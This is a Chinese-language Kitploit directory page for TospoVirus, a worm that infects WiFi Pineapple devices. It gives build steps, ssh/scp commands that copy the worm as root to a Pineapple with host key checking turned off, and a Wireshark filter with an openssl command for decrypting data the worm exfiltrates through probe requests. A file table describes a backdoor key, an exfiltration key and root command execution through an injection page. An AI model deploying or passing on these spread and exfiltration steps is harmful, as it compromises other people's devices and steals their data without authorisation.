Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TospoVirus — A WiFi Pineapple infecting worm. | Kitploit
工具/GitHubGitHub/catatonicprime/tospovirus
Persistence MechanismsExploitationLateral MovementData ExfiltrationPost-ExploitationWireless SecurityCommand and ControlRemote Access Trojan
GitHubcatatonicprime/tospovirus

TospoVirus

A WiFi Pineapple infecting worm.

查看仓库
17411年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

构建 TospoVirus 以进行分发:


./build.sh

分发到运行 2.3 版本的可用 Pineapple:

ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
注意:你需要一台已配置的设备,或者使用 metasploit-module 来启用 ssh

解密外泄的数据:

Wireshark 过滤器为:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem

可选地,可以这样使用 harvest.py 脚本:
python harvest.py [monitor-iface]

文件与用途:

FilePurpose
tv病毒本体。
tvbd“主”后门密钥,请勿分发私钥。
tvd披露密钥,用于通过探测请求外泄数据。
tospo_rsa每台受感染设备独有的身份私钥,用作传输密钥。
tospo_rsa.pub身份公钥,通过命令注入页面传输,使私密身份能够在远程设备上以 root 身份执行操作。
w下发的无线配置选项,用于恢复先前的连接。
n下发的网络配置选项,用于恢复先前的连接。
注意:以 'tv' 开头的文件在感染新设备时都会被传输。请勿使用以 'tv' 开头的名称添加私钥等文件,否则你的私钥将暴露于取证分析中。
下载工具